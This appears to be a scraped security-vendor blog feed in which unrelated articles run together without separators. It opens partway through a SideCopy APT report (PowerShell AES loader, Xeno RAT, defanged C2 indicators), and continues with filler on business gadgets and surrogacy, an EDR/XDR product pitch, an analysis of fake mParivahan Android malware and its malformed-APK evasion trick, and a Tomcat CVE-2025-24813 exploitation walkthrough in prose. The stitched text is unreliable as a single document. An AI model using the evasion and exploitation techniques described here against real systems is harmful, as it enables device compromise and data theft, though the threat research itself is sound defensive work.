The execution of PowerShell command with basic arguments “-NoProfile -ExecutionPolicy Bypass -Command” to ignore policies and profile is seen. Two parameters are sent:
After some delay, the encryption key is decoded from Base64, and the first 16 bytes are treated as the IV for AES encryption (CBC mode with PKCS7 padding). This is done to load the decrypted binary as a .NET assembly directly into memory, invoking its entry point.
Fig. 30 – PowerShell decryption
Custom Xeno RAT
Dumping the final .NET payload named ‘DevApp.exe’ leads us to familiar functions seen in Xeno RAT. It is an open source remote access trojan that was first seen at the end of 2023. Key features include HVNC, live microphone access, socks5 reverse proxy, UAC bypass, keylogger, and more. The custom variant used by SideCopy has added basic string manipulation methods with C2 and port as 79.141.161[.]58:1256.
Fig. 31 – Custom Xeno RAT
Last year, a custom Xeno RAT variant named MoonPeak was used by a North Korean-linked APT tracked as UAT-5394. Similarly, custom Spark RAT variants have been adopted by Chinese-speaking actors such as DragonSpark and TAG-100.
Infrastructure and Attribution
Domains used for malware staging by the threat group. Most of them have registrar as GoDaddy.com, LLC.
Staging Domain
First Seen
Created
ASN
modspaceinterior[.]com
Jan 2025
Sept 2024
AS 46606 – GoDaddy
drjagrutichavan[.]com
Jan 2025
Oct 2021
AS 394695 – GoDaddy
nhp.mowr[.]gov[.]in
Dec 2024
Feb 2005
AS 4758 – National Informatics Centre
egovservice[.]in
Dec 2024
June 2023
AS 140641 – GoDaddy
pmshriggssssiwan[.]in
Nov 2024
Mar 2024
AS 47583 – Hostinger
educationportals[.]in
Aug 2024
Aug 2024
AS 22612 – NameCheap
C2 domains have been created just before the campaign in the last week of December 2024. With Canadian registrar “Internet Domain Service BS Corp.”, they resolve to IPs with Cloudflare ASN 13335 located in California.
C2 Domain
Created
IP
ASN
updates.widgetservicecenter[.]com
2024-Dec-25
104.21.15[.]163
172.67.163[.]31
ASN 13335 – Clouflare
updates.biossysinternal[.]com
2024-Dec-23
172.67.167[.]230
104.21.13[.]17
ASN 202015 – HZ Hosting Ltd.
The C2 for Xeno RAT 79.141.161[.]58 has a unique common name (CN=PACKERP-63KUN8U) with HZ Hosting Limited of ASN 202015. The port used for communication is 1256 but an open RDP port 56777 is also observed.
Fig. 32 – Diamond Model
Both C2 domains are associated with Cloudflare ASN 13335, resolved to IP range 172.67.xx.xx. Similar C2 domains on this ASN have previously been leveraged by SideCopy in attacks targeting the maritime sector. Considering the past infection clusters, observed TTPs and hosted open directories, these campaigns with new TTPs are attributed to SideCopy with high confidence.
Conclusion
Pakistan-linked SideCopy APT group has significantly evolved its tactics since late December 2024, expanding its targets to include critical sectors such as railways, oil & gas, and external affairs ministries. The group has shifted from using HTA files to MSI packages as a primary staging mechanism and continues to employ advanced techniques like DLL side-loading, reflective loading, and AES decryption via PowerShell. Additionally, they are leveraging customized open-source tools like Xeno RAT and Spark RAT, along with deploying the newly identified CurlBack RAT. Compromised domains and fake sites are being utilized for credential phishing and payload hosting, highlighting the group’s ongoing efforts to enhance persistence and evade detection.
In today’s competitive business environment, leveraging advanced technology is not just advantageous but often essential for staying ahead. From improving operational efficiency to enhancing customer experiences, advanced gadgets play a crucial role in driving business success. Despite the challenges businesses face, such as the statistic that up to 70% of all business partnerships fail, integrating advanced gadgets can mitigate risks and propel growth.
Enhancing Operational Efficiency
One of the primary benefits of advanced gadgets in business is their ability to streamline operations and boost productivity. Whether it’s through automation tools, smart devices, or advanced software solutions, technology empowers businesses to automate repetitive tasks, optimize workflows, and allocate resources more effectively. By reducing manual errors and accelerating processes, businesses can achieve greater efficiency and operational excellence.
Ensuring Workplace Safety
The safety and security of employees and assets are paramount concerns for any business. According to the National Fire Protection Association, an average of 3,340 fires occur in offices every year, highlighting the importance of robust safety measures. Advanced gadgets such as smart fire detection systems, CCTV cameras with AI-powered analytics, and automated emergency response systems can significantly enhance workplace safety. These technologies not only detect potential hazards early but also enable swift responses, mitigating risks and minimizing damage.
Navigating Regulatory Compliance
Navigating regulatory requirements and tax obligations is another critical aspect of business operations. For example, in New Jersey, the State Treasury imposes a 6.625% Sales Tax on sales of most tangible personal property, specified digital products, and certain services unless exempt under state law. Advanced gadgets equipped with financial management software can automate tax calculations, ensure compliance with regulatory standards, and facilitate accurate reporting. By reducing the burden of manual compliance tasks, businesses can avoid penalties and optimize financial processes.
Empowering Customer Engagement
Customer engagement and satisfaction are fundamental drivers of business growth. Advanced gadgets such as customer relationship management (CRM) systems, personalized marketing automation tools, and AI-powered chatbots enable businesses to deliver tailored experiences and responsive customer service. These technologies analyze customer data in real-time, anticipate needs, and personalize interactions, fostering long-term customer loyalty and driving revenue growth.
Harnessing Data for Strategic Insights
In today’s data-driven economy, insights derived from data analytics can provide businesses with a competitive edge. Advanced gadgets equipped with analytics tools collect, analyze, and visualize data from various sources, offering valuable insights into market trends, customer behavior, and operational performance. By making informed decisions based on data-driven insights, businesses can identify opportunities, mitigate risks, and optimize strategies for sustainable growth.
Improving Decision-Making with Real-Time Analytics
Advanced gadgets are invaluable in empowering businesses with real-time data analytics capabilities. These tools enable organizations to gather and analyze data swiftly, providing deep insights into market dynamics, consumer preferences, and operational efficiencies. By harnessing these insights, businesses can make informed decisions promptly, adapt strategies proactively, and capitalize on emerging opportunities. Real-time analytics not only enhances strategic planning but also optimizes resource allocation, driving sustained growth and competitiveness in today’s fast-paced business landscape.
Conclusion
In conclusion, integrating advanced gadgets into business operations can significantly enhance efficiency, safety, compliance, customer engagement, and strategic decision-making. Despite the challenges highlighted by statistics showing high business partnership failure rates and the prevalence of office fires, advanced technology offers solutions to mitigate risks and drive success. By leveraging automation, enhancing safety measures, ensuring regulatory compliance, empowering customer engagement, and harnessing data-driven insights, businesses can navigate challenges more effectively and capitalize on opportunities in a rapidly evolving marketplace.
As technology continues to evolve, businesses that embrace advanced gadgets not only position themselves for current success but also future-proof their operations against emerging challenges. By investing in the right technology solutions and adapting them to meet specific business needs, organizations can innovate, grow, and thrive in an increasingly competitive landscape. Embracing the transformative potential of advanced gadgets is not merely advantageous but imperative for businesses striving to achieve sustainable success and leadership in their respective industries.
In today’s rapidly evolving cyber landscape, organizations face an increasing number of sophisticated threats. Consequently, the need for robust cybersecurity measures has never been more critical. Two prominent solutions in this domain are Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR). While both serve essential roles in safeguarding an organization’s digital assets, they cater to different needs and offer distinct functionalities. This article delves deep into the nuances of EDR vs XDR, providing insights into their features, differences, and when to deploy each solution.
What is EDR?
Endpoint Detection and Response (EDR) is a cybersecurity approach that focuses primarily on monitoring and securing endpoint devices such as laptops, desktops, and servers. EDR solutions are designed to detect, investigate, and respond to potential threats at the endpoint level. By employing advanced analytics and automated responses, EDR tools operate under the premise of an “assume breach” mentality. This means they are always on the lookout for suspicious activities, even if the organization believes its systems are secure.
Key Features of EDR
Real-time Monitoring: EDR solutions provide continuous surveillance of endpoint activities, enabling organizations to detect anomalies swiftly.
Automated Response: EDR tools can automatically contain threats, limiting their potential impact before human intervention is required.
Data Collection: These solutions gather extensive data from endpoints, including system logs, file access, and user activities, allowing for thorough investigations.
Threat Intelligence: EDR platforms leverage threat intelligence to enhance their detection capabilities, identifying known threats and emerging vulnerabilities.
Benefits of EDR
Focused Security: EDR is primarily designed to protect endpoints, making it an excellent choice for organizations with significant endpoint exposure.
Cost-effective: For businesses with limited budgets, EDR solutions can provide robust endpoint protection without the higher costs associated with more comprehensive solutions.
Scalability: As organizations grow, EDR solutions can easily adapt to increasing numbers of endpoints and evolving threats.
What is XDR?
Extended Detection and Response (XDR) is a holistic cybersecurity solution that integrates data from multiple security layers, including endpoints, networks, servers, and cloud environments. Unlike EDR, which focuses solely on endpoint devices, XDR aims to provide a comprehensive view of an organization’s security posture by correlating data across various sources. This enables security teams to detect and respond to threats more effectively.
Key Features of XDR
Unified Security Approach: XDR consolidates data from various security tools and platforms, offering a centralized view of threats across the entire infrastructure.
Enhanced Visibility: By analyzing data from multiple sources, XDR provides deeper insights into potential threats, making it easier to identify complex attack patterns.
Automated Threat Response: Like EDR, XDR also employs automation to respond to threats, but it does so across a broader range of data sources.
Cross-domain Detection: XDR is capable of detecting threats that may originate from different areas, such as network traffic, cloud applications, and email systems.
Benefits of XDR
Comprehensive Coverage: XDR’s ability to integrate data from various sources ensures that organizations have a complete view of their security landscape.
Improved Incident Response: By providing a unified view of threats, XDR allows security teams to respond more quickly and effectively to incidents.
Reduced Complexity: XDR simplifies security operations by reducing the number of tools and interfaces security teams must manage.
EDR vs XDR: Key Differences
While both EDR and XDR are essential components of a modern cybersecurity strategy, they serve different purposes and have distinct features. Below is a comparison highlighting the critical differences between EDR and XDR:
Feature
EDR (Endpoint Detection and Response)
XDR (Extended Detection and Response)
Scope
Focuses on endpoint devices
Covers multiple security layers
Data Sources
Endpoint-specific data
Integrates data from various sources
Detection Methods
Signature-based and behavioral analysis
Advanced analytics, AI, and data correlation
Threat Detection
Primarily endpoint threats
Advanced threats across all domains
Incident Response
Endpoint-focused
Cross-domain response
Integration
Typically integrated with endpoint tools
Integrates with multiple security solutions
When to Choose EDR
Organizations may opt for EDR solutions under specific circumstances:
Small to Medium-Sized Infrastructure: Businesses with fewer endpoints and primarily endpoint-based threats may find EDR sufficient for their needs.
Budget Constraints: EDR solutions tend to be more cost-effective than XDR, making them ideal for organizations with limited financial resources.
Strong Endpoint Security Posture: If an organization already has robust endpoint security measures in place, EDR can enhance those efforts without overwhelming complexity.
When to Choose XDR
On the other hand, XDR is more suitable for organizations facing different challenges:
Complex IT Environments: Organizations with extensive IT infrastructures that require visibility across endpoints, networks, and cloud applications should consider XDR.
High-Risk Industries: Sectors such as finance, healthcare, and government, which are often targeted by sophisticated threats, can benefit from XDR’s comprehensive approach.
Need for Advanced Analytics: Organizations looking to leverage machine learning and AI to identify patterns across multiple data sources will find XDR more advantageous.
The Role of Seqrite EDR and XDR
Seqrite offers advanced EDR and XDR solutions tailored to meet the diverse needs of organizations. With a focus on comprehensive endpoint protection and extended visibility, Seqrite’s offerings empower businesses to strengthen their security posture effectively.
Seqrite EDR
Seqrite EDR provides real-time monitoring and automated response capabilities, ensuring that organizations can detect and mitigate threats swiftly. Its user-friendly interface and robust analytics make it a valuable addition to any cybersecurity strategy.
Seqrite XDR
Seqrite XDR enhances threat detection and response capabilities by integrating data from various security layers. This solution empowers organizations to gain deeper insights into their security landscape, facilitating quicker and more effective incident response.
Conclusion
In the ongoing battle against cyber threats, understanding the distinctions between EDR and XDR is vital for organizations looking to enhance their security measures. While EDR excels in endpoint protection, XDR provides a more comprehensive view of an organization’s security posture by integrating data across multiple sources. Depending on the specific needs and challenges faced by an organization, either solution—or a combination of both—can significantly bolster cybersecurity efforts.
By investing in advanced solutions like Seqrite EDR and XDR, organizations can ensure they are well-equipped to navigate the complexities of the modern threat landscape and safeguard their digital assets effectively.
Cybercriminals continually refine their tactics, making Android malware more insidious and challenging to detect. A new variant of the fake NextGen mParivahan malware has emerged, following its predecessor’s deceptive strategies but introducing significant enhancements.
Previously, attackers exploited the government’s traffic notification system to distribute malware, sending fake messages that appeared to be official traffic violation alerts. These messages contained details like ticket numbers and vehicle registration information to appear legitimate, tricking users into downloading a malicious app. Once installed, the app requested extensive permissions, hid its icon, and silently exfiltrated sensitive data, including SMS messages—while communicating with attackers via a Telegram bot.
Figure 1. WhatsApp message received by Victim
In this latest variant, the malware is distributed under the guise of “NextGen mParivahan,” mimicking the official government application. It uses the same distribution method as before—leveraging fake traffic violation messages to lure users into installing the malicious app.
The official NextGen mParivahan app, developed by the Ministry of Road Transport & Highways, provides digital access to driving licenses, vehicle registration certificates, and other transport services. Available on the Google Play Store, it replaces the earlier mParivahan app with improved features and user experience.
However, cybercriminals have seized the opportunity presented by the app’s rebranding, distributing malware under the “NextGen mParivahan” name to deceive users. In this latest variant, the malware retains its SMS-stealing capabilities. It has significantly expanded its reach—now targeting messages from social media, communication, and e-commerce apps, posing an even more significant threat to user privacy.
Moreover, some samples have employed a stealthier command-and-control (C2) mechanism by concealing its C2 details within a compiled .so file and dynamically generating them at runtime. This approach greatly complicates detection and analysis. Some samples are intentionally malformed to further hinder security efforts and leverage multi-stage dropper-payload architectures to bypass signature-based and heuristic detection systems.
Our previous blog analyzed the earlier version’s infection chain and communication tactics (Beware! Malicious Android Malware Disguised as Government Alerts). These latest variants not only retain those functionalities but expand on them, increasing both their stealth and data theft capabilities.
In this blog, we’ll explain how this new variant operates and why its new enhancements make it an even greater threat to Android users.
Technical analysis:
We came across two variants of the new version: one utilizing a malformed multi-stage dropper-payload architecture and another employing a stealthier C2 extraction method while stealing notification data from other apps.
Malformed multi-stage dropper-payload
First Stage – Dropper
Second Stage – Payload
File name
e_challan_report
parivahan
MD5
ad4626eff5238ce7c996852659c527bc
ae1f49bd14027c7adea18147cb02f72a
App name
NextGen mParivahan
NextGen mParivahan
Package Name
com.xyz.dropper
com.example.icici
Anti-analysis technique
The malware author intentionally crafted these dropper and payload APKs to hinder static analysis. Many open-source Android APK analysis tools failed to process this APK, making analysis more challenging. See below:
Apktool failed to decompile the APK-
Figure 2. Apktool Error
Jadx failed to decompile –
Figure 3. Jadx Error
Androguard failed to decompile –
Figure 4. Androguard Error
Bytecode viewer failed to decompile –
Figure 5. Bytecode viewer Error
7zip also failed to extract APK file –
Figure 6. 7zip Error
Android build tools AAPT (Android Asset Packaging Tool) and AAPT2 (Android Asset Packaging Tool) are also unable to dump the AndroidManifest.xml file –
Figure 7. AAPT Error
Additionally, this malformed APK file fails to install on Android 8.1 and earlier versions due to a corrupt XML file, as the OS cannot extract it like later Android versions.
Figure 8. Android 8.1 APK installation Error
The error displayed by all these tools indicates an unsupported compression method, meaning the APK file uses an invalid compression technique. However, AAPT and Android OS 8.1 (API level 27) report a corrupt AndroidManifest.xml error unrelated to the unsupported compression method. Despite this, the malformed APK installs and runs smoothly on Android devices and emulators running Android OS 9 (API level 28) and above without any issues.
Why Do Analysis Tools Fail While Android OS (9+) Runs This APK?
An APK file is essentially a ZIP archive. Below is its header format, where the values at offsets 08 and 09 indicate the compression method used in the ZIP file.
Figure 9. Structure of APK ZIP file (Reference: The structure of a PKZip file)
Android APK files follow the ZIP format and typically use two compression methods:
Store (No Compression) – Used for files that don’t need compression, such as pre-optimized binaries and some assets.
Deflate (Standard Compression) – The most used method for compressing resources, XML files, and other non-executable content.
The compression method used by most of the APK files –
Figure 10. Normal file Hex
The compression method used by this malformed dropper APK file is neither Deflate nor Store. Its value is 0x1998 (decimal 6552), which is not supported by the ZIP format.
Figure 11. Malformed APK Hex
All analysis tools strictly follow the ZIP format and expect the compression method to be either Deflate or Store only. However, Android OS only checks whether the compression method is Deflate or not. If it is not Deflate, the OS assumes it to be Store (i.e., uncompressed).
Android 9 introduced a different method for parsing monolithic apps compared to Android 8. This new implementation handles asset access differently. As a result, certain APKs that caused manifest corruption errors in Android 8 and earlier versions no longer encounter this issue on Android 9.
Extracting and decoding AndroidManifest file
I wrote a script to extract the raw AndroidManifest.xml from an APK by parsing its ZIP structure. It locates the Central Directory, finds AndroidManifest.xml, extracts its compression details and raw data, and then, by using Androguard, decodes the extracted raw AndroidManifest.xml into a readable XML format.
Figure 12. Extraction and encoding AndroidManifest.xml
Below is the decoded AndroidManifest.xml of the Dropper APK. It requests permissions for QUERY_ALL_PACKAGES to list installed apps and REQUEST_INSTALL_PACKAGES to install the payload application.
Figure 13. Decoded AndroidManifest xml file of Dropper application.
Below is the decoded AndroidManifest.xml of the Payload APK. It requests sensitive permissions such as RECEIVE_SMS, READ_SMS, and SEND_SMS to access and send SMS messages.
Figure 14. Decoded AndroidManifest xml from payload application
Malware execution
After launch, the Dropper application prompts the user to update the app. Upon clicking “Update,” it requests permission to allow installations from unknown sources. Once granted, it installs the Payload APK, which uses the same icon as the Dropper but hides its icon from the app drawer.
Figure 15. Dropper application execution
Now, if the user clicks on the mParivahan app icon, it launches the Payload application. First, it requests SMS and Call permissions. Then, it displays a page asking the user to enter their vehicle and phone numbers to track challan status. Next, it prompts the user to pay ₹1 via PhonePe, Google Pay, or Paytm, requiring them to enter their payment PIN. After the transaction, it shows a confirmation page stating, “Payment completed, wait for 30 minutes, and do not delete the app from the device.”
Figure 16. Payload application execution
However, the application steals the entered information in the background and saves it to a Firebase database. Since the app has SMS access permissions, it also captures incoming SMS data and uploads it to Firebase.
Figure 17. Pin and device info stealing code
Stealthier native c2 extraction and notification stealer
File name
NextGen mParivahan.apk
MD5
8bf7ea1c35697967a33c0876df5f30b9
App name
NextGen mParivahan
Package name
com.sakurai.endo3798132
Upon launch, the second variant requests SMS and call management permissions. It then prompts the user to grant notification access to the malware. After obtaining all necessary permissions, the user is asked to enter a phone number. Once the user clicks “Continue,” it opens the Google homepage and hides its icon.
Figure 18. App execution
Malware, which has access to notification data, continuously monitors notifications. Whenever a new notification is posted, it captures the data and sends it to the C2 server.
Figure 19. Notification stealer code
The malware application maintains a list of apps targeted for notification theft. The targeted applications include WhatsApp, Facebook, Amazon, Zomato, Telegram, Google Messages, Gmail etc.
Figure 20. Targeted application list
C2 extraction from native code
The malware dynamically generates the C2 server URL at runtime, avoiding plain-text storage to evade detection. The figure below shows code from the Java section, where the SecreatHeven class is responsible for loading the native library “libbunnycoban.so” and defining native functions. Here, the bunnylovesCarrot() function returns the C2 server URL. There are two additional functions, hiddendandelion() and SecreatAcron(), that return the IP info service URL and IP info token. The malware might use these functions during C2 server generation, as they are not referenced elsewhere in the code.
Figure 21. Java code loading so file
Here is a code snippet that shows the code for generating the C2 server from the .so file.
Figure 22. Code used to construct c2 server from so file
The logs clearly reveal the C2 server used by this malware –
Figure 23. c2 mention in logcat
Both variants also have SMS-stealing capabilities similar to the previous version. They access SMS data and send it to the extracted C2 server or Firebase. Additionally, they implement a bootloader broadcast receiver for persistence, which allows the application to start in the background after the device boots.
MITRE ATT&CK Tactics and Techniques:
Quick Heal Detection of Android Malware
Quick Heal detects such malicious applications with variants of Android.Spyagent.A
It is recommended that all mobile users should install a trusted Anti-Virus like “Quick Heal Mobile Security for Android” to mitigate such threats and stay protected. Our antivirus software restricts users from downloading malicious applications on their mobile devices. Download your Android protection here
Conclusion:
This malware variant demonstrates how cybercriminals continuously advance their techniques to evade detection and steal more user data. Leveraging malformed APKs, dynamic C2 generation, and anti-analysis methods makes it increasingly difficult for traditional security tools to identify their malicious activities. Additionally, their ability to access notifications, SMS, and sensitive app data poses a significant risk to user privacy.
However, as threats evolve, so do analysis methodologies. Security solutions and threat intelligence efforts are improving detection techniques by deep-diving into obfuscation strategies, dynamic analysis, and advanced threat-hunting approaches. Strengthening security awareness, using trusted sources for app installations, and employing modern analysis tools are essential in combating these emerging threats.
Do not click on any links received through messages or any other social media platforms as they may be intentionally or inadvertently pointing to malicious sites.
Read the pop-up messages from the Android system before accepting or/allowing any new permissions.
Be extremely cautious about what applications you download on your phone, as malware authors can easily spoof the original applications’ names, icons, and developer details.
Advancements in medical technology have significantly transformed the surrogacy process, offering new opportunities and improving outcomes for all parties involved. From the initial application to post-birth care, technology plays a crucial role in making surrogacy a viable and successful option for many families. Let’s explore how these advancements have impacted the various stages of the surrogacy journey.
Streamlining the Application Process
Every year, thousands of women express their interest in becoming surrogate mothers. The process begins with a thorough application and screening to ensure candidates are suitable for the role. Medical technology has streamlined this initial stage, enabling agencies to efficiently process and review applications. Online platforms and databases allow for quick and secure submission of documents, while advanced screening tools help identify potential surrogates who meet the necessary health and psychological criteria.
Ensuring Health and Compatibility
The first three months of the surrogacy process involve a rigorous schedule of paperwork, legal formalities, and medical exams, as stated by Elevate Baby. Medical technology has enhanced these early stages by providing sophisticated diagnostic tools and tests. Surrogate mothers undergo comprehensive health evaluations to ensure they are physically capable of carrying a pregnancy to term. This includes blood tests, ultrasounds, and other imaging techniques that offer detailed insights into their health status. These exams help identify any potential issues early on, ensuring a smooth and safe journey ahead.
Facilitating Legal and Ethical Compliance
Legal aspects are a critical component of the surrogacy process. The initial months also involve meticulous legal work to protect the rights and responsibilities of all parties. Medical technology aids in this by ensuring accurate and secure documentation. Digital contracts and electronic signatures have replaced traditional paperwork, making the process more efficient and less prone to errors. Secure online portals allow for the easy sharing and storage of legal documents, ensuring compliance with local regulations and ethical standards.
Enhancing Fertility Treatments
One of the most significant impacts of medical technology on surrogacy is in the realm of fertility treatments. In vitro fertilization (IVF) is a cornerstone of the surrogacy process, and advancements in this field have greatly improved success rates. Technologies such as preimplantation genetic testing (PGT) allow for the screening of embryos for genetic abnormalities before implantation. This increases the likelihood of a healthy pregnancy and reduces the risk of complications. Additionally, innovations in cryopreservation enable the freezing and storage of eggs, sperm, and embryos, providing greater flexibility and options for intended parents and surrogates.
Monitoring Pregnancy and Health
Throughout the surrogacy journey, continuous monitoring of the surrogate’s health is paramount. Modern medical technology offers a range of tools to track the progress of the pregnancy and ensure the well-being of both the surrogate and the developing baby. Regular ultrasounds, non-invasive prenatal testing (NIPT), and wearable health devices provide real-time data on the surrogate’s condition. This information allows healthcare providers to promptly address any concerns and make informed decisions to support a healthy pregnancy.
Supporting Emotional Well-being
The surrogacy process can be emotionally taxing for all involved. Medical technology also plays a role in supporting the mental health of surrogate mothers. Telemedicine and virtual counseling services offer accessible support, allowing surrogates to connect with mental health professionals from the comfort of their homes. These resources help surrogates manage stress, anxiety, and other emotional challenges, ensuring a positive and fulfilling experience.
Post-Birth Care and Follow-Up
After the birth of the child, medical technology continues to be essential. Surrogates receive comprehensive post-birth care to ensure their physical and emotional recovery. Regular follow-up visits and check-ups are facilitated by advanced medical scheduling systems and electronic health records, ensuring continuity of care. It is recommended that individuals visit a doctor at least once a year to maintain their overall health, and this applies to surrogate mothers as well. Annual check-ups help monitor long-term health outcomes and provide ongoing support.
Apache Tomcat is a popular, open-source web server and servlet container maintained by the Apache Software Foundation. It provides a reliable and scalable environment for executing Java Servlets and serving web pages built using Java Server Pages (JSP). Frequently deployed in both development and production environments, Tomcat plays a crucial role in delivering dynamic Java-based web applications across various enterprise use cases.
Recently, a critical security vulnerability identified as CVE-2025-24813 was discovered in Apache Tomcat. This vulnerability exploits a flaw in the handling of partial file uploads and session file persistence, potentially allowing attackers to achieve remote code execution (RCE) under certain conditions. The issue arises from how Tomcat’s default servlet manages write operations combined with deserialization logic for persisted session files.
CVE-2025-24813
Initially published in early March with a CVSS score of 5.5, the severity of CVE-2025-24813 was later reassessed and upgraded to 9.8 (High). Recognizing the potential impact of this flaw, the Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalogue, underscoring the urgency for affected organizations to patch their systems.
CVE-2025-24813 is a critical vulnerability in Apache Tomcat that can lead to remote code execution (RCE) when specific server configurations are in place. The issue arises from how Tomcat handles partial PUT requests in conjunction with file-based session persistence.
This issue becomes exploitable when the default servlet is explicitly configured with ‘readonly’ parameter is set to false — a setting that enables write operations such as HTTP PUT. By default, Tomcat sets ‘readonly’ to true, which restricts write access and helps mitigate risk. This parameter is defined in the web.xml configuration file, typically located in the conf/ directory of the Tomcat installation.
When partial PUT support is also enabled (enabled by default), an attacker can exploit this behaviour to upload a crafted serialized payload, targeting a session file. If Tomcat is configured to persist session data to disk, the uploaded file may later be automatically deserialized by the server, resulting in attacker-controlled code execution.
The vulnerability affects the following versions of Apache Tomcat:
11.0.0‑M1 through 11.0.2
10.1.0‑M1 through 10.1.34
9.0.0‑M1 through 9.0.98
Exploitation Prerequisites for CVE-2025-24813
To exploit CVE-2025-24813, several server-side conditions must be in place. These prerequisites enable an attacker to craft a malicious PUT request that results in the deserialization of attacker-controlled data, potentially leading to remote code execution (RCE).
The following conditions must be met:
The default servlet’s readonly attribute is set to false, permitting write access via HTTP PUT requests
Partial PUT functionality is enabled — i.e., Tomcat accepts the Content-Range header (enabled by default)
The application is configured to use Tomcat’s file-based session persistence mechanism
Exploitation Flow
The exploitation of CVE-2025-24813 involves a sequence of carefully crafted steps that take advantage of Tomcat’s handling of partial file uploads and session deserialization. The following outlines a typical attack chain under vulnerable conditions:
Environment Setup: The target server must have ‘readonly’ parameter set to false for the default servlet, partial PUT support enabled, and file-based session persistence configured.
Payload Generation: The attacker generates a malicious serialized object — typically using a tool like ysoserial — embedding a command that will execute upon deserialization.
Payload Upload: The crafted payload is uploaded to the server via an HTTP PUT request with a Content-Range header. This simulates a partial upload and results in the creation of a session file on disk.
Triggering Deserialization: A follow-up request is made to the application with the JSESSIONID set to the uploaded session file’s name. This causes Tomcat to deserialize the file, assuming it to be a legitimate session object.
Code Execution: If a suitable deserialization gadget exists on the classpath, the payload is executed, leading to remote code execution under the privileges of the Tomcat process.
Mitigation
The recommended and most effective mitigation for CVE-2025-24813 is to upgrade Apache Tomcat to a version where the vulnerability has been addressed. This flaw is fully patched in the following Tomcat releases:
These versions include enhancements to the handling of temporary files created via partial PUT requests, ensuring such files are not mistakenly deserialized as session objects — thereby preventing remote code execution.
For environments where immediate upgrades are not possible, the following temporary mitigations can help reduce risk:
Keep the default servlet’s readonly parameter set to true, which prevents write operations via PUT requests. This is the default and recommended setting.
Disable support for partial PUT requests, especially if not used by the application. This can be achieved at the connector level or via upstream web server rules (e.g., Nginx or Apache HTTPD).
Avoid using file-based session persistence, particularly when writable paths overlap with session storage locations.
Review and sanitize the server classpath to remove unnecessary libraries such as commons-collections, which may introduce exploitable deserialization gadgets.
Seqrite Endpoint Protection
All Seqrite Customers are protected from this vulnerability by following signatures:
